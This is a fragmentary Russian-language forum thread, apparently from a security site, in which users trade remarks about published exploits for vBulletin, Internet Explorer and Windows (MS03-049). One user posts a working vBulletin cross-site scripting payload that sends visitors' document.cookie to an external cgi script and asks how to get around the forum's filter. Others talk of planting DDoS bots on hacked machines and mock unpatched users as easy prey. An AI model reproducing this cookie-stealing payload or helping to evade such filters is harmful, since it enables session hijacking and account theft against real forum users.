Dron_Sochi
Ну, и что в этом хорошего? Забили диск фуфлом (ЛЮБОЙ чел, у которого есть словарик английского и немного мозгов сможет заюзать сплоит!)
Уж лучше бы чем-то стоящим набили

Обсуждение статьи Межсайтовое выполнение сценариев в vBulletin

Я так понимаю, это прокатит если тока HTML разрешён. Верно? И тады вместо мессаги вставить этот кусок кода и возрадоваться?

Ошибка.
Можно этот пост удалить.

Обсуждение статьи Подмена URL в Microsoft Internet Explorer (IE)

У меня ВООБЩЕ нет на чём компилить :-\

Ты почитай ещё раз название вируса и разузнай что такое эксплоит! Антивируснякам базу нечем набивать - вот они с страдают: лишь бы чем-нить набить

d1rt
Начинается... Кул хацкеры в очередной раз толкают лекцию о том, какие скрипткидди сволочи.

Во-первых, уже ДАВНО заплатка есть. Скажу больше: есть ссылка на патчи на ЭТОМ ЖЕ форуме!!!
Во-вторых, на удалённые тачки можно запустить DDoS-ботов и заставлять тачки "гасить" разные другие тачки в сети

Зачем?

Я правильно понял, что строку типа:
showthread.php?t=[VID]&page=[INT][XSS]

нужно вставить в строку набора адреса в браузере?

Тады должно получиться что-то типа: www.forum.com\showthread.php?t=[VID]&page=[INT][XSS]

Всё верно?

У меня та же Опера, но свободная память закончилась... на несколько минут

Mr.Clumsy
Спасибо.
Вот только проблема: форум,похоже, фильтрует такие штуки, т.к. после создания сообщения с кодом:
[FONT=expression(document.location.replace
('http://www.feronix.h12.ru/cgi-bin/cookie.cgi?cookie='+docu ment.cookie))]

после редактирования текст кода показан как:

[FONT=expression(document.location.replace
(]

То есть сервак вырезал адрес редиректа. Я сначала думал, что это я стормозил и так написал, но после 5'икратного повтора редактирования сообщения понял, что всё-таки это форум вырезает

Пытался вместо символа "+" писать "%2B" - всё равно вырезает ((
Остаётся только проверить будет ли форум фильтровать, такие запросы, если я это в свою подпись включу...

Или, может, есть другие способы обхода фильтра?

MishaSt
Ты недопонял
Мне строку: [FONT=expression(alert(document.cookie))]text</font>

Нужно модифицировать так, чтоб был редирект на мой скрипт
И я спрашивал как это сделать? Я так понял, что модифицированный сплоит должен выглядеть так:

[FONT=expression(document.location.replace
('http://www.feronix.h12.ru/cgi-bin/cookie.cgi?cookie='+docu ment.cookie))]text</font>

Я всё правильно понял?

Есть сервер, в котором мона осуществить межсайтовый скриптинг:
[FONT=expression(alert(document.cookie))]text</font> will made the HTML :
<span  style='font-family:expression(alert(document.cookie))'>te xt</span>

Есть некий сервер server.com На нём лежит мой скрипт: server.com/cgi-bin/cookie.cgi

Задача: саму строку эксплоита модифицировать так, чтоб исполнялся мой скрипт с сервера server.com

Не поможите?

Интересно: а как прописать себе другой IP адрес?

И что? Это плохо? А потом на нас катят бочку, мол скрипткидди - мы! [IMG]http://www.securitylab.ru/forum/smileys/smiley7.gif[/IMG]

Если б я знал Дельфи (вернее, Паскаль)... Я же ни один язык не знаю... пока  [IMG]http://www.securitylab.ru/forum/smileys/smiley6.gif[/IMG]
Может, всё-таки поделишься[IMG]http://www.securitylab.ru/forum/smileys/smiley25.gif[/IMG]

Именно: нехрен наплёвывать на безопасность! Не думает о безопасности - сносить такого админа!!! Даже файерволл не настроить!
Я как узнал об уязвимости - тут же создал правила в Аутпосте! Ещё даже эксплоит не вышел!
А сейчас до сих пор какие-то **** не пропатчились. Что ж, значит, будут доенными коровами [IMG]http://www.securitylab.ru/forum/smileys/smiley2.gif[/IMG]

Это ещё почему? Ты сам подумай: появился удобный эксплоит - все стали ставить заплатки! Сейчас же далеко не все знают о проблемах Workstation Service (MS03-049). В итоге: есть эксплоит под командную строку, но никто толком не защищён!

И от кого будет больше ущерба: то RPC Exploit GUI v2, от которого уже большая часть челов защитилась, или от Workstation Service Remote Exploit (MS03-049), про который далеко не все знают?

Потом: ламерьё этим эксплоитьм не так уж и часто пользуется, т.к. не знают как и что вводить, даже глядя на поставляемый план! Сам проверил: паре ламеров и юзеров дал - нифига!

Для скрипткидди сделаны практически все эксплоиты.
Да и потом: что я виноват, что ли, что всякие лохи невзирая на предупреждения не патчатся?